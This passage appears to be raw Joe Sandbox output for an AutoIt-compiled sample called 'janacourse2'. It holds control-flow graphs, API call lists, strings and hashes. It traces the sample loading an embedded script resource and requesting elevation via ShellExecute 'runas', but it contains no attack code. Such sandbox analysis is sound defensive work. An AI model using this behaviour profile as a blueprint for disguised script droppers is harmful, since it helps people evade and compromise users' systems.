fb1404 97382->97383 97384 fba961 22 API calls 97383->97384 97385 fb13c6 97384->97385 97385->97342 97386->97376

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 234 fb42de-fb434d call fba961 GetVersionExW call fb6b57 239 ff3617-ff362a 234->239 240 fb4353 234->240 242 ff362b-ff362f 239->242 241 fb4355-fb4357 240->241 243 fb435d-fb43bc call fb93b2 call fb37a0 241->243 244 ff3656 241->244 245 ff3632-ff363e 242->245 246 ff3631 242->246 263 ff37df-ff37e6 243->263 264 fb43c2-fb43c4 243->264 250 ff365d-ff3660 244->250 245->242 247 ff3640-ff3642 245->247 246->245 247->241 249 ff3648-ff364f 247->249 249->239 252 ff3651 249->252 253 fb441b-fb4435 GetCurrentProcess IsWow64Process 250->253 254 ff3666-ff36a8 250->254 252->244 256 fb4437 253->256 257 fb4494-fb449a 253->257 254->253 258 ff36ae-ff36b1 254->258 260 fb443d-fb4449 256->260 257->260 261 ff36db-ff36e5 258->261 262 ff36b3-ff36bd 258->262 265 fb444f-fb445e LoadLibraryA 260->265 266 ff3824-ff3828 GetSystemInfo 260->266 270 ff36f8-ff3702 261->270 271 ff36e7-ff36f3 261->271 267 ff36bf-ff36c5 262->267 268 ff36ca-ff36d6 262->268 272 ff37e8 263->272 273 ff3806-ff3809 263->273 264->250 269 fb43ca-fb43dd 264->269 278 fb449c-fb44a6 GetSystemInfo 265->278 279 fb4460-fb446e GetProcAddress 265->279 267->253 268->253 280 fb43e3-fb43e5 269->280 281 ff3726-ff372f 269->281 274 ff3715-ff3721 270->274 275 ff3704-ff3710 270->275 271->253 282 ff37ee 272->282 276 ff380b-ff381a 273->276 277 ff37f4-ff37fc 273->277 274->253 275->253 276->282 285 ff381c-ff3822 276->285 277->273 287 fb4476-fb4478 278->287 279->278 286 fb4470-fb4474 GetNativeSystemInfo 279->286 288 fb43eb-fb43ee 280->288 289 ff374d-ff3762 280->289 283 ff373c-ff3748 281->283 284 ff3731-ff3737 281->284 282->277 283->253 284->253 285->277 286->287 294 fb447a-fb447b FreeLibrary 287->294 295 fb4481-fb4493 287->295 290 ff3791-ff3794 288->290 291 fb43f4-fb440f 288->291 292 ff376f-ff377b 289->292 293 ff3764-ff376a 289->293 290->253 298 ff379a-ff37c1 290->298 296 fb4415 291->296 297 ff3780-ff378c 291->297 292->253 293->253 294->295 296->253 297->253 299 ff37ce-ff37da 298->299 300 ff37c3-ff37c9 298->300 299->253 300->253
                                                                                                            APIs
                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00FB430D
                                                                                                              • Part of subcall function 00FB6B57: _wcslen.LIBCMT ref: 00FB6B6A
                                                                                                            • GetCurrentProcess.KERNEL32(?,0104CB64,00000000,?,?), ref: 00FB4422
                                                                                                            • IsWow64Process.KERNEL32(00000000,?,?), ref: 00FB4429
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00FB4454
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FB4466
                                                                                                            • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00FB4474
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 00FB447B
                                                                                                            • GetSystemInfo.KERNEL32(?,?,?), ref: 00FB44A0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                            • API String ID: 3290436268-3101561225
                                                                                                            • Opcode ID: 0a1b127b1bdc3d2bd63358ad9ce2a18c36060f5f6256971568631e1d1193203f
                                                                                                            • Instruction ID: 6859cad03b5dea153378e9071c39d8632e765cdad9135644c9eceb64304931fd
                                                                                                            • Opcode Fuzzy Hash: 0a1b127b1bdc3d2bd63358ad9ce2a18c36060f5f6256971568631e1d1193203f
                                                                                                            • Instruction Fuzzy Hash: A5A1C576D0E2D4DFC731D76AB1806ED7FA46F26710B08C899D4C1A3A0AD27E4506EFA1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 553 fb42a2-fb42ba CreateStreamOnHGlobal 554 fb42da-fb42dd 553->554 555 fb42bc-fb42d3 FindResourceExW 553->555 556 fb42d9 555->556 557 ff35ba-ff35c9 LoadResource 555->557 556->554 557->556 558 ff35cf-ff35dd SizeofResource 557->558 558->556 559 ff35e3-ff35ee LockResource 558->559 559->556 560 ff35f4-ff3612 559->560 560->556
                                                                                                            APIs
                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00FB50AA,?,?,00000000,00000000), ref: 00FB42B2
                                                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FB50AA,?,?,00000000,00000000), ref: 00FB42C9
                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,00FB50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FB4F20), ref: 00FF35BE
                                                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00FB50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FB4F20), ref: 00FF35D3
                                                                                                            • LockResource.KERNEL32(00FB50AA,?,?,00FB50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FB4F20,?), ref: 00FF35E6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                            • String ID: SCRIPT
                                                                                                            • API String ID: 3051347437-3967369404
                                                                                                            • Opcode ID: 14b5ff9088eb1140d1266704a69fa86ae0d0d25ab84920a73ce2e3e44dededc0
                                                                                                            • Instruction ID: 3b7d98ccdad3cced64a54caf232b0a86c90f338852ef37b41d7d6c788703b9bf
                                                                                                            • Opcode Fuzzy Hash: 14b5ff9088eb1140d1266704a69fa86ae0d0d25ab84920a73ce2e3e44dededc0
                                                                                                            • Instruction Fuzzy Hash: 0F11A0B4301700BFE7218FA6DE89F677BB9EBC5B51F14416DB84686150DB71EC00AA30

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00FB2B6B
                                                                                                              • Part of subcall function 00FB3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,01081418,?,00FB2E7F,?,?,?,00000000), ref: 00FB3A78
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,?,?,01072224), ref: 00FF2C10
                                                                                                            • ShellExecuteW.SHELL32(00000000,?,?,01072224), ref: 00FF2C17
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                                            • String ID: runas
                                                                                                            • API String ID: 448630720-4000483414
                                                                                                            • Opcode ID: d3e8325c3fb1e6be890c911fc42072f1410dc08acfe9306ee52ba92c655c9778
                                                                                                            • Instruction ID: 55b7b9e9257df595bc8c7fc487501799741bcf576927728ebf4291019599ff51
                                                                                                            • Opcode Fuzzy Hash: d3e8325c3fb1e6be890c911fc42072f1410dc08acfe9306ee52ba92c655c9778
                                                                                                            • Instruction Fuzzy Hash: EB11DF316083056AC714FF66DC919EE7BA4AFD5310F48541DF2C2060A2CF398A4AAB12
                                                                                                            APIs
                                                                                                            • GetInputState.USER32 ref: 00FBD807
                                                                                                            • timeGetTime.WINMM ref: 00FBDA07
                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FBDB28
                                                                                                            • TranslateMessage.USER32(?), ref: 00FBDB7B
                                                                                                            • DispatchMessageW.USER32(?), ref: 00FBDB89
                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FBDB9F
                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00FBDBB1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                            • String ID:
                                                                                                            • API String ID: 2189390790-0
                                                                                                            • Opcode ID: e2e81a7196e4698051f001aac606f2659b01a75d28329279802647f2f3782a91
                                                                                                            • Instruction ID: fe8b1fb6ecd66bee2dbe6925207ae2133e8fd652d9cb2bdfd06f7f5acbdbc70b
                                                                                                            • Opcode Fuzzy Hash: e2e81a7196e4698051f001aac606f2659b01a75d28329279802647f2f3782a91
                                                                                                            • Instruction Fuzzy Hash: 1C420370608242EFE72ACF25C888BAABBE0BF85314F14855DE4D587291E775E844DF92

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00FB2D07
                                                                                                            • RegisterClassExW.USER32(00000030), ref: 00FB2D31
                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FB2D42
                                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00FB2D5F
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FB2D6F
                                                                                                            • LoadIconW.USER32(000000A9), ref: 00FB2D85
                                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FB2D94
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                            • Opcode ID: 55dca9242f0cb2da827a2a9e9a61967a1f52a0db53d9cb9ab087b2fdda2155df
                                                                                                            • Instruction ID: f5100ae5c95c06c5dc6b0909c7bb5f16191c003559461e4d15ef46d38a611763
                                                                                                            • Opcode Fuzzy Hash: 55dca9242f0cb2da827a2a9e9a61967a1f52a0db53d9cb9ab087b2fdda2155df
                                                                                                            • Instruction Fuzzy Hash: 52211DB5D06308AFEB20DF94EA89BDD7BB4FB08700F00411AF5D1A6284D7BA0541CF50

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 302 ff065b-ff068b call ff042f 305 ff068d-ff0698 call fdf2c6 302->305 306 ff06a6-ff06b2 call fe5221 302->306 311 ff069a-ff06a1 call fdf2d9 305->311 312 ff06cb-ff0714 call ff039a 306->312 313 ff06b4-ff06c9 call fdf2c6 call fdf2d9 306->313 322 ff097d-ff0983 311->322 320 ff0716-ff071f 312->320 321 ff0781-ff078a GetFileType 312->321 313->311 324 ff0756-ff077c GetLastError call fdf2a3 320->324 325 ff0721-ff0725 320->325 326 ff078c-ff07bd GetLastError call fdf2a3 CloseHandle 321->326 327 ff07d3-ff07d6 321->327 324->311 325->324 331 ff0727-ff0754 call ff039a 325->331 326->311 341 ff07c3-ff07ce call fdf2d9 326->341 329 ff07df-ff07e5 327->329 330 ff07d8-ff07dd 327->330 334 ff07e9-ff0837 call fe516a 329->334 335 ff07e7 329->335 330->334 331->321 331->324 345 ff0839-ff0845 call ff05ab 334->345 346 ff0847-ff086b call ff014d 334->346 335->334 341->311 345->346 351 ff086f-ff0879 call fe86ae 345->351 352 ff087e-ff08c1 346->352 353 ff086d 346->353 351->322 355 ff08c3-ff08c7 352->355 356 ff08e2-ff08f0 352->356 353->351 355->356 358 ff08c9-ff08dd 355->358 359 ff097b 356->359 360 ff08f6-ff08fa 356->360 358->356 359->322 360->359 361 ff08fc-ff092f CloseHandle call ff039a 360->361 364 ff0963-ff0977 361->364 365 ff0931-ff095d GetLastError call fdf2a3 call fe5333 361->365 364->359 365->364
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FF039A: CreateFileW.KERNELBASE(00000000,00000000,?,00FF0704,?,?,00000000,?,00FF0704,00000000,0000000C), ref: 00FF03B7
                                                                                                            • GetLastError.KERNEL32 ref: 00FF076F
                                                                                                            • __dosmaperr.LIBCMT ref: 00FF0776
                                                                                                            • GetFileType.KERNELBASE(00000000), ref: 00FF0782
                                                                                                            • GetLastError.KERNEL32 ref: 00FF078C
                                                                                                            • __dosmaperr.LIBCMT ref: 00FF0795
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00FF07B5
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00FF08FF
                                                                                                            • GetLastError.KERNEL32 ref: 00FF0931
                                                                                                            • __dosmaperr.LIBCMT ref: 00FF0938
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                            • String ID: H
                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                            • Opcode ID: 8edfa7b03dcf0479a3263f6c3cef784981b6abd05ae5f5f24ea6f73e8ae00ed9
                                                                                                            • Instruction ID: d326fb06b4027cd46e0d7bd29020ef97df315792cce728fd10d3db573c9daee8
                                                                                                            • Opcode Fuzzy Hash: 8edfa7b03dcf0479a3263f6c3cef784981b6abd05ae5f5f24ea6f73e8ae00ed9
                                                                                                            • Instruction Fuzzy Hash: 45A16A32A041088FDF28AF68DC51BBD7BA1AF06320F140159F951DF3A2DB358D16EB91

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,01081418,?,00FB2E7F,?,?,?,00000000), ref: 00FB3A78
                                                                                                              • Part of subcall function 00FB3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FB3379
                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FB356A
                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FF318D
                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FF31CE
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00FF3210
                                                                                                            • _wcslen.LIBCMT ref: 00FF3277
                                                                                                            • _wcslen.LIBCMT ref: 00FF3286
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                            • API String ID: 98802146-2727554177
                                                                                                            • Opcode ID: 57fa606fcc656c7403b02cb8ebfdaa4feb12a578625973e3f9f19c7a70aacb82
                                                                                                            • Instruction ID: bda101b1985c7d382c5712cd1ad91126928c683063c04f8ed71a43cf5e420d80
                                                                                                            • Opcode Fuzzy Hash: 57fa606fcc656c7403b02cb8ebfdaa4feb12a578625973e3f9f19c7a70aacb82
                                                                                                            • Instruction Fuzzy Hash: 3D71BDB14083019EC324EF66EC919AFBBE8FF85750F40842EF5C593164EB799A48DB52

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00FB2B8E
                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00FB2B9D
                                                                                                            • LoadIconW.USER32(00000063), ref: 00FB2BB3
                                                                                                            • LoadIconW.USER32(000000A4), ref: 00FB2BC5
                                                                                                            • LoadIconW.USER32(000000A2), ref: 00FB2BD7
                                                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FB2BEF
                                                                                                            • RegisterClassExW.USER32(?), ref: 00FB2C40
                                                                                                              • Part of subcall function 00FB2CD4: GetSysColorBrush.USER32(0000000F), ref: 00FB2D07
                                                                                                              • Part of subcall function 00FB2CD4: RegisterClassExW.USER32(00000030), ref: 00FB2D31
                                                                                                              • Part of subcall function 00FB2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FB2D42
                                                                                                              • Part of subcall function 00FB2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00FB2D5F
                                                                                                              • Part of subcall function 00FB2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FB2D6F
                                                                                                              • Part of subcall function 00FB2CD4: LoadIconW.USER32(000000A9), ref: 00FB2D85
                                                                                                              • Part of subcall function 00FB2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FB2D94
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                            • String ID: #$0$AutoIt v3
                                                                                                            • API String ID: 423443420-4155596026
                                                                                                            • Opcode ID: a56d8045ba2bd6ba624394af854d2975f1c1826c73637f06c311f7962e5ebd03
                                                                                                            • Instruction ID: a6f8cb13488f407fc2861dd46cd2e62d87a04ef6d822bc1da432b545bc7443c0
                                                                                                            • Opcode Fuzzy Hash: a56d8045ba2bd6ba624394af854d2975f1c1826c73637f06c311f7962e5ebd03
                                                                                                            • Instruction Fuzzy Hash: 82214CB4E05314AFDB20DFA6E985ADD7FB5FF08B50F00801AE580A6694D7BA0541DF90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 443 fb3170-fb3185 444 fb3187-fb318a 443->444 445 fb31e5-fb31e7 443->445 447 fb31eb 444->447 448 fb318c-fb3193 444->448 445->444 446 fb31e9 445->446 449 fb31d0-fb31d8 DefWindowProcW 446->449 450 ff2dfb-ff2e23 call fb18e2 call fce499 447->450 451 fb31f1-fb31f6 447->451 452 fb3199-fb319e 448->452 453 fb3265-fb326d PostQuitMessage 448->453 454 fb31de-fb31e4 449->454 489 ff2e28-ff2e2f 450->489 456 fb31f8-fb31fb 451->456 457 fb321d-fb3244 SetTimer RegisterWindowMessageW 451->457 459 ff2e7c-ff2e90 call 101bf30 452->459 460 fb31a4-fb31a8 452->460 455 fb3219-fb321b 453->455 455->454 461 ff2d9c-ff2d9f 456->461 462 fb3201-fb3214 KillTimer call fb30f2 call fb3c50 456->462 457->455 464 fb3246-fb3251 CreatePopupMenu 457->464 459->455 484 ff2e96 459->484 465 fb31ae-fb31b3 460->465 466 ff2e68-ff2e77 call 101c161 460->466 468 ff2dd7-ff2df6 MoveWindow 461->468 469 ff2da1-ff2da5 461->469 462->455 464->455 473 ff2e4d-ff2e54 465->473 474 fb31b9-fb31be 465->474 466->455 468->455 476 ff2da7-ff2daa 469->476 477 ff2dc6-ff2dd2 SetFocus 469->477 473->449 478 ff2e5a-ff2e63 call 1010ad7 473->478 482 fb3253-fb3263 call fb326f 474->482 483 fb31c4-fb31ca 474->483 476->483 485 ff2db0-ff2dc1 call fb18e2 476->485 477->455 478->449 482->455 483->449 483->489 484->449 485->455 489->449 490 ff2e35-ff2e48 call fb30f2 call fb3837 489->490 490->449
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00FB316A,?,?), ref: 00FB31D8
                                                                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,00FB316A,?,?), ref: 00FB3204
                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FB3227
                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00FB316A,?,?), ref: 00FB3232
                                                                                                            • CreatePopupMenu.USER32 ref: 00FB3246
                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00FB3267
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                            • String ID: TaskbarCreated
                                                                                                            • API String ID: 129472671-2362178303
                                                                                                            • Opcode ID: 6d1d60b67c2d9360c9375bb3d4510e225e84949a35cb2280157dd6f6a4e10193
                                                                                                            • Instruction ID: b7d8a6a2f82ef0343541df37678944850c15dd26cccbc8a88805b128e9aa9a48
                                                                                                            • Opcode Fuzzy Hash: 6d1d60b67c2d9360c9375bb3d4510e225e84949a35cb2280157dd6f6a4e10193
                                                                                                            • Instruction Fuzzy Hash: 84412B36AC8204ABDB246B7DDE4ABFD3A1DFF05350F044119F5C2C5295CB7A8A41BB61

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
